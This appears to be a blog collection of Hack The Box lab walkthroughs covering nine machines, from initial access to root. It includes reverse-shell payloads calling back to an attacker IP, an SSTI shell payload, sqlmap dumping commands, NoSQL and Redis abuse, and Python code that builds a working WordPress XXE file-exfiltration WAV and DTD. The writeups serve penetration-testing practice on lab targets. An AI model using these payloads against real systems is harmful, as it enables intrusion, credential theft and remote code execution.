Tag: Walkthrough
Walkthrough
Passage HTB Writeup
I scan the ports with nmap.

I look at the website, which runs CuteNews, and I find an exploit that gives me a shell.

https://www.exploit-db.com/exploits/48800
After downloading the exploit, I run it and get a shell. A reverse shell is more comfortable, so I get one.




Under the users directory I find some information encoded in base64. I read it with the cat command.
cat *.php
I decode the base64 string: it is a PHP-serialized user record whose pass field is a 64-character hex digest (the length of a SHA-256 hash), and I crack that hash.
YToxOntzOjQ6Im5hbWUiO2E6MTp7czoxMDoicGF1bC1jb2xlcyI7YTo5OntzOjI6ImlkIjtzOjEwOiIxNTkyNDgzMjM2IjtzOjQ6Im5hbWUiO3M6MTA6InBhdWwtY29sZXMiO3M6MzoiYWNsIjtzOjE6IjIiO3M6NToiZW1haWwiO3M6MTY6InBhdWxAcGFzc2FnZS5odGIiO3M6NDoibmljayI7czoxMDoiUGF1bCBDb2xlcyI7czo0OiJwYXNzIjtzOjY0OiJlMjZmM2U4NmQxZjgxMDgxMjA3MjNlYmU2OTBlNWQzZDYxNjI4ZjQxMzAwNzZlYzZjYjQzZjE2ZjQ5NzI3M2NkIjtzOjM6Imx0cyI7czoxMDoiMTU5MjQ4NTU1NiI7czozOiJiYW4iO3M6MToiMCI7czozOiJjbnQiO3M6MToiMiI7fX19


pass (SHA-256 hash): e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd
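The decode-and-parse step above, as an added Python example (not code from the original writeup): the base64 blob is a PHP serialize() string, so a small unserializer pulls the record fields out, and the 64-hex-character pass value is sized like a SHA-256 digest (hashcat mode 1400). The crack_sha256 loop and its wordlist are constructed stand-ins for john/hashcat; the only real data is the blob copied from the page.

```python
import base64
import hashlib
import re

# Base64 blob copied from the users directory dump above (a CuteNews user record).
BLOB = "YToxOntzOjQ6Im5hbWUiO2E6MTp7czoxMDoicGF1bC1jb2xlcyI7YTo5OntzOjI6ImlkIjtzOjEwOiIxNTkyNDgzMjM2IjtzOjQ6Im5hbWUiO3M6MTA6InBhdWwtY29sZXMiO3M6MzoiYWNsIjtzOjE6IjIiO3M6NToiZW1haWwiO3M6MTY6InBhdWxAcGFzc2FnZS5odGIiO3M6NDoibmljayI7czoxMDoiUGF1bCBDb2xlcyI7czo0OiJwYXNzIjtzOjY0OiJlMjZmM2U4NmQxZjgxMDgxMjA3MjNlYmU2OTBlNWQzZDYxNjI4ZjQxMzAwNzZlYzZjYjQzZjE2ZjQ5NzI3M2NkIjtzOjM6Imx0cyI7czoxMDoiMTU5MjQ4NTU1NiI7czozOiJiYW4iO3M6MToiMCI7czozOiJjbnQiO3M6MToiMiI7fX19"


def php_unserialize(data):
    """Minimal PHP unserialize(): arrays (a), strings (s), ints (i), bools (b), null (N).
    data must be a str whose characters map 1:1 to bytes (decode with latin-1),
    because the LEN in s:LEN:"..." is a byte count."""
    pos = 0

    def parse():
        nonlocal pos
        t = data[pos]
        if t == "N":                      # N;
            pos += 2
            return None
        if t in "ib":                     # i:123;  b:1;
            end = data.index(";", pos)
            val = int(data[pos + 2:end])
            pos = end + 1
            return bool(val) if t == "b" else val
        if t == "s":                      # s:LEN:"...";
            colon = data.index(":", pos + 2)
            length = int(data[pos + 2:colon])
            start = colon + 2
            val = data[start:start + length]
            pos = start + length + 2
            return val
        if t == "a":                      # a:COUNT:{key;value;...}
            colon = data.index(":", pos + 2)
            count = int(data[pos + 2:colon])
            pos = colon + 2
            out = {}
            for _ in range(count):
                key = parse()
                out[key] = parse()
            pos += 1                      # closing }
            return out
        raise ValueError(f"unsupported PHP type {t!r} at offset {pos}")

    return parse()


def cutenews_users(blob):
    """Decode the base64 users file and return {username: record}."""
    raw = base64.b64decode(blob).decode("latin-1")
    return php_unserialize(raw)["name"]


HASH_HINTS = {32: "MD5 (hashcat -m 0)", 40: "SHA-1 (hashcat -m 100)",
              64: "SHA-256 (hashcat -m 1400)", 128: "SHA-512 (hashcat -m 1700)"}


def hash_hint(digest):
    """Guess the unsalted algorithm from the hex length; the page's hash is 64 chars."""
    if not re.fullmatch(r"[0-9a-fA-F]+", digest):
        return "not a bare hex digest"
    return HASH_HINTS.get(len(digest), "unknown length")


def sha256_hex(word):
    return hashlib.sha256(word.encode()).hexdigest()


def crack_sha256(digest, wordlist):
    """Offline stand-in for john/hashcat: first word whose SHA-256 equals digest, else None."""
    digest = digest.lower()
    return next((w for w in wordlist if sha256_hex(w) == digest), None)


if __name__ == "__main__":
    for name, rec in cutenews_users(BLOB).items():
        print(name, rec["email"], rec["pass"], hash_hint(rec["pass"]))
    # Constructed wordlist; the real crack used rockyou against the digest above.
    print(crack_sha256(sha256_hex("letmein"), ["password", "letmein"]))
```

The acl field ("2") and the id are plain strings in the record; only pass needs cracking, and because it is an unsalted digest a wordlist attack with hashcat -m 1400 is the right tool.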

I switch to the paul user.

I search for vulnerabilities. It takes a long time, but I find nothing, so I look at paul's authorized_keys. The key there is nadav's, and the same key pair lets me switch to nadav via ssh.
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzXiscFGV3l9T2gvXOkh9w+BpPnhFv5AOPagArgzWDk9uUq7/4v4kuzso/lAvQIg2gYaEHlDdpqd9gCYA7tg76N5RLbroGqA6Po91Q69PQadLsziJnYumbhClgPLGuBj06YKDktI3bo/H3jxYTXY3kfIUKo3WFnoVZiTmvKLDkAlO/+S2tYQa7wMleSR01pP4VExxPW4xDfbLnnp9zOUVBpdCMHl8lRdgogOQuEadRNRwCdIkmMEY5efV3YsYcwBwc6h/ZB4u8xPyH3yFlBNR7JADkn7ZFnrdvTh3OY+kLEr6FuiSyOEWhcPybkM5hxdL9ge9bWreSfNC1122qq49d nadav@passage


After the ssh login as paul, I run linpeas, which finds a USBCreator vulnerability. Abusing it as paul does not work, so I try it as nadav.
https://www.exploit-db.com/exploits/36820



MetaTwo HTB Writeup
I scan with the nmap tool.

I add the domain and its IP address to /etc/hosts.

I scan with gobuster in both DNS and directory mode.

I find a vulnerable version of the BookingPress plugin under http://metapress.htb/events/

I follow the same steps as in the image above. I have to find the nonce first; once I have it, I run the exploit and get a response.


It may be a SQL injection, so I test the total_service parameter with sqlmap.
sqlmap -u "http://metapress.htb/wp-admin/admin-ajax.php" --method POST --data "action=bookingpress_front_get_category_services&_wpnonce=ad14d8652b&category_id=123&total_service=111" -p total_service --level=5 --risk=3 --dbs
Yes, there is a SQL injection vulnerability.

sqlmap -u "http://metapress.htb/wp-admin/admin-ajax.php" --method POST --data "action=bookingpress_front_get_category_services&_wpnonce=ad14d8652b&category_id=123&total_service=111" -p total_service --level=5 --risk=3 -D blog --tables
sqlmap -u "http://metapress.htb/wp-admin/admin-ajax.php" --method POST --data "action=bookingpress_front_get_category_services&_wpnonce=ad14d8652b&category_id=123&total_service=111" -p total_service --level=5 --risk=3 -D blog -T wp_users --dump
sqlmap prints the dumped wp_users rows.


I crack the manager's hash with John the Ripper.
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
I log in to the website.


WordPress 5.6.2 has an XXE vulnerability (CVE-2021-29447).
https://blog.wpsec.com/wordpress-xxe-in-media-library-cve-2021-29447/
I follow the instructions from the link.


I upload the WAV file and get the response.

I decode it from base64.

I change the target path. To pick it I look at the WordPress directory structure.

I modify my exploit as shown in the image above.
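How the WAV/XXE payload from the linked post is put together, as an added Python example rather than the writeup's own exploit. The attacker URL http://10.10.14.5/ and the DTD file name xxe.dtd are assumptions, and the request line fed to decode_leak is a constructed sample of what the listener logs. Changing target_file is the "modify the exploit" step above: php://filter base64-encodes the file so its newlines and angle brackets cannot break the XML entity.

```python
import base64
import struct
from urllib.parse import urlparse

ATTACKER = "http://10.10.14.5/"   # assumed listener: serves xxe.dtd and receives the leak


def build_dtd(target_file, callback_url=ATTACKER):
    """External DTD fetched by the victim's XML parser.
    %file reads the target through php://filter (base64), %init defines %trick,
    and %trick makes the parser request the callback URL with the file as ?p=."""
    return (
        f'<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource={target_file}">\n'
        f'<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM \'{callback_url}?p=%file;\'>" >\n'
    )


def build_wav(dtd_url=ATTACKER + "xxe.dtd"):
    """Minimal RIFF/WAVE file whose iXML chunk is the XML document with the XXE DOCTYPE."""
    xml = (
        '<?xml version="1.0"?>'
        f"<!DOCTYPE ANY[<!ENTITY % remote SYSTEM '{dtd_url}'>%remote;%init;%trick;]>\x00"
    ).encode()
    chunk = b"iXML" + struct.pack("<I", len(xml)) + xml
    return b"RIFF" + struct.pack("<I", 4 + len(chunk)) + b"WAVE" + chunk


def wav_chunks(data):
    """Walk the RIFF chunk list and return {chunk_id: payload}; a sanity check for the file above."""
    if data[:4] != b"RIFF" or data[8:12] != b"WAVE":
        raise ValueError("not a RIFF/WAVE file")
    chunks, pos = {}, 12
    while pos + 8 <= len(data):
        cid = data[pos:pos + 4]
        size = struct.unpack("<I", data[pos + 4:pos + 8])[0]
        chunks[cid] = data[pos + 8:pos + 8 + size]
        pos += 8 + size + (size & 1)   # chunk bodies are padded to an even length
    return chunks


def decode_leak(request_line):
    """Recover the file from the callback hit, e.g. 'GET /?p=<base64> HTTP/1.1'.
    The query is split by hand because parse_qs would turn base64 '+' into spaces."""
    query = urlparse(request_line.split()[1]).query
    params = dict(part.split("=", 1) for part in query.split("&") if "=" in part)
    return base64.b64decode(params["p"]).decode()


if __name__ == "__main__":
    with open("payload.wav", "wb") as fh:
        fh.write(build_wav())
    with open("xxe.dtd", "w") as fh:
        fh.write(build_dtd("/etc/passwd"))
    # Constructed example of the request the listener sees after the upload is processed.
    print(decode_leak("GET /?p=cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaAo= HTTP/1.1"))
```

Serve xxe.dtd and capture the callback on the same listener (a plain python3 -m http.server is enough for both); the media library only needs the file to parse as WAV far enough for the iXML chunk to be read.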


I find FTP credentials. There is an interesting file I have to look at, so I download the PHP file and find a credential in it.


I connect via ssh. There is a secret file under jnelson's home directory.

I try to crack the PGP private key, and it succeeds.


I execute the command and I am root.

Previse HTB Writeup
I scan the target machine with the nmap tool.

I search for directories to find endpoints.


I want to look at these endpoints, but the website redirects. I have to find a vulnerability, so I open Burp Suite and intercept the connection.

I right-click and choose Do intercept > Response to this request, because I want to see and modify the redirect response.


When I modify the HTTP response, the website shows this page instead of redirecting. I register an account.



I log in to the website.

I download the backup file and unzip it. I do a static analysis of the files.

I find this information, which will be useful later.

I find a command execution again 🙂 and I try it with Burp Suite.

I send a reverse shell payload and get a reverse shell. In the shell I use the credentials from the file I downloaded from the website to connect to the MySQL database.


I try to crack the hash with hashcat.



I connect to the target machine via ssh.

First, I execute 'sudo -l' and open access_backup.sh to examine it.

Is a PATH hijack possible? I try it.


I create a fake gzip under /tmp and prepend /tmp to the $PATH variable. When I execute access_backup.sh, the shell resolves the bare gzip command by walking $PATH in order, so it finds my file first.
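The PATH hijack, as an added Python harness that is not part of the original writeup. VULNERABLE_SCRIPT is an assumed stand-in for access_backup.sh (only its unqualified gzip call matters); HARDENED_SCRIPT pins PATH, which is the fix. The fake gzip only drops a marker file where a real attack would spawn a root shell.

```python
import os
import shutil
import subprocess
import tempfile

# Assumed shape of /opt/scripts/access_backup.sh: gzip looked up by bare name in $PATH.
VULNERABLE_SCRIPT = '#!/bin/sh\ngzip -c "$1" > "$1.gz"\n'
# Hardened: pin PATH before any lookup (calling /bin/gzip by absolute path works too).
HARDENED_SCRIPT = '#!/bin/sh\nPATH=/usr/bin:/bin\nexport PATH\ngzip -c "$1" > "$1.gz"\n'


def plant_fake_gzip(directory, marker):
    """Write an executable named gzip that only leaves a marker; an attacker would exec a shell."""
    fake = os.path.join(directory, "gzip")
    with open(fake, "w") as fh:
        fh.write(f"#!/bin/sh\necho hijacked > '{marker}'\n")
    os.chmod(fake, 0o755)
    return fake


def which_gzip(search_path):
    """First executable named gzip along search_path: the same first-match rule sh applies."""
    return shutil.which("gzip", path=search_path)


def resolution_demo():
    """Where `gzip` resolves with the attacker's directory first versus a pinned PATH."""
    with tempfile.TemporaryDirectory() as tmp:
        fake = plant_fake_gzip(tmp, os.path.join(tmp, "pwned"))
        return {
            "fake": fake,
            "hijacked_hits_fake": which_gzip(f"{tmp}:/usr/bin:/bin") == fake,
            "pinned_hits_fake": which_gzip("/usr/bin:/bin") == fake,
        }


def hijack_succeeds(script_body):
    """Run script_body with the attacker's directory first in PATH; True if the fake gzip ran."""
    with tempfile.TemporaryDirectory() as tmp:
        marker = os.path.join(tmp, "pwned")
        plant_fake_gzip(tmp, marker)
        script = os.path.join(tmp, "access_backup.sh")
        with open(script, "w") as fh:
            fh.write(script_body)
        data = os.path.join(tmp, "data.txt")
        with open(data, "w") as fh:
            fh.write("constructed backup input\n")
        subprocess.run(["/bin/sh", script, data],
                       env={"PATH": f"{tmp}:/usr/bin:/bin"}, capture_output=True)
        return os.path.exists(marker)


if __name__ == "__main__":
    print(resolution_demo())
    print("vulnerable script hijacked:", hijack_succeeds(VULNERABLE_SCRIPT))
    print("hardened script hijacked:  ", hijack_succeeds(HARDENED_SCRIPT))
```

One caveat for the sudo case: sudo normally replaces PATH with secure_path, so the hijack only reaches a root-run script when the sudoers rule lets the caller's PATH through (env_keep or SETENV), which is the condition to check in the 'sudo -l' output.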

It works; I am root.

Sense HTB Writeup
I scan the ports with the nmap tool.


I scan both ports with gobuster. One of them is the website on port 443. The scan takes quite a while :). I find an interesting file.

When I look at the file, there are credentials.

I look up pfSense on the internet, and there are two passwords it could be.

username: rohit password: pfsense

There isn't any other useful information to abuse.


I execute the exploit. It works and I am root, unexpectedly. 😀

Doctor HTB Writeup
I scan the target machine with the nmap tool.

There are two web services.


There is an interesting detail on the website on port 80: I find a domain name, doctors.htb. I search for directories with gobuster.


I register on the website and log in.

I try SSTI in a new post, but it doesn't look successful. When I view the archive endpoint, it succeeds :).
https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection



I find a payload to get a shell (Jinja2: walk ().__class__.__base__.__subclasses__() to reach os.popen). The upstream payload ends by running /bin/cat flag.txt over the socket, so I replace that with /bin/sh -i to get an interactive shell, and I put my listener address in place of "ip".
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#exploit-the-ssti-by-calling-popen-without-guessing-the-offset
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\", \"-i\"]);'").read().zfill(417)}}{%endif%}{% endfor %}

After I get a shell, I execute the id command.

What is adm? I search on the internet: members of the adm group can read the system logs under /var/log.

I search for clues in the log files. Perfect!!! I find a password for shaun.


I switch user.

On port 8089 is splunkd. I find a vulnerability in it that provides privesc.

Credentials are required. I have credentials, but I don't know whether they will work. I try them for authentication; they are correct.

I execute the payload. Finally, I can read root.txt 🙂


Cronos HTB Writeup
It is the most unstable machine I have seen in HTB. It was very hard for me and took over 5 hours.
Nmap scan result.

I scan with gobuster in DNS mode. Gobuster finds a subdomain.

I try a SQL injection attack on the website. It succeeds.

I try a command injection attack.

I upload php-reverse-shell.php with wget.

I open http://admin.cronos.htb/php-reverse-shell.php in the web browser. Finally, I get a shell.


I execute linpeas, and it shows the vulnerability that leads to privesc.

I upload a php-reverse-shell with a different listening port and replace artisan with it.


Postman HTB Writeup
I scan the target machine with nmap.

I look up Redis. What is it? I find useful information about Redis on HackTricks.
https://book.hacktricks.xyz/network-services-pentesting/6379-pentesting-redis

I try to do the same.
First I create an id_rsa key pair and copy id_rsa.pub into spaced_key.txt (the key padded with blank lines). After following the instructions above, I send the key to the Redis database.

Then I connect to the target machine via ssh.

I execute linpeas.


I find an interesting file. It contains a certificate, and I try to crack its password.



I try to connect with these credentials, but it does not succeed.

I switch user from the redis shell.

Webmin 1.910 has a vulnerability. I had found the exploit before finding the credentials, but it needs credentials, which I did not have then.



Shoppy HTB Writeup
I scan the target IP with the nmap tool.

There are two open ports. I run gobuster to find directories.

The directory found is not working. I decide to fuzz for subdomains.
wfuzz -u http://10.10.11.180 -H "Host: FUZZ.shoppy.htb" -w /usr/share/wordlists/Seclists-2023.2/Discovery/DNS/bitquark-subdomain-top1000000.txt

I tweak the command because the output shows every result (the default response is 169 bytes long), so I hide responses of that size.
wfuzz -u http://10.10.11.180 -H "Host: FUZZ.shoppy.htb" -w /usr/share/wordlists/Seclists-2023.2/Discovery/DNS/bitquark-subdomain-top1000000.txt -hh 169

I find one subdomain: mattermost

Oops. I have to find credentials to log in, or find another way.
I go back to the Shoppy login page and try a NoSQL injection after reading the blog post below.
https://nullsweep.com/a-nosql-injection-primer-with-mongo/

admin'||'a'=='a
I log in 🙂

I click Search for users.

I enter the same payload I used to log in.

I try to crack the hashes, and one of them is found.

The hash belongs to josh. I log in to the subdomain.

I find credentials to connect to the target machine via ssh.

I connect via ssh and find an interesting executable file. When I open it with the cat command, the password is in plaintext.

SampleAccess

I switch user and execute linpeas.

I see that I am in the docker group, and I find a privesc on GTFOBins.



Horizontall HTB Writeup
I scan the ports with the nmap tool.

I open the website and find valuable information I can use. After a while I find a subdomain in a JS file.
app.c68eb462.js

http://api-prod.horizontall.htb

I scan for endpoints on the subdomain with gobuster. I find three endpoints.

gobuster dir -u http://api-prod.horizontall.htb
/review
/admin
/users
There is a login panel for users on the subdomain.

I search for strapi in searchsploit, and there is an exploit I can use. I download it, and it works to get a shell.
searchsploit strapi

searchsploit -m multiple/webapps/50239.py

python3 50239.py http://api-prod.horizontall.htb
My payload to get a shell: bash -c 'sh -i >& /dev/tcp/10.10.14.15/8081 0>&1'


I look at the listening sockets; locally there is a service bound to localhost:8000 that is not reachable from outside.
netstat -tlnp

I use curl to view the page. While examining the response, I find the web framework's version.
curl 127.0.0.1:8000


Yes!!! The version is vulnerable and I find an exploit, but I have some connection issues. I decide to port forward, so I create an SSH key pair.
ssh-keygen
I copy the public key into strapi's authorized_keys. Before that I create the .ssh directory on the target machine.
mkdir /opt/strapi/.ssh
echo "ssh-rsa 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 mustafa@kali" > /opt/strapi/.ssh/authorized_keys


ssh -i ~/.ssh/id_rsa -L 8000:127.0.0.1:8000 strapi@10.10.11.105

Port forwarding works, and I can run the exploit locally against the forwarded port.
https://github.com/nth347/CVE-2021-3129_exploit

chmod +x exploit.py
./exploit.py http://localhost:8000 Monolog/RCE1 'cat /root/root.txt'
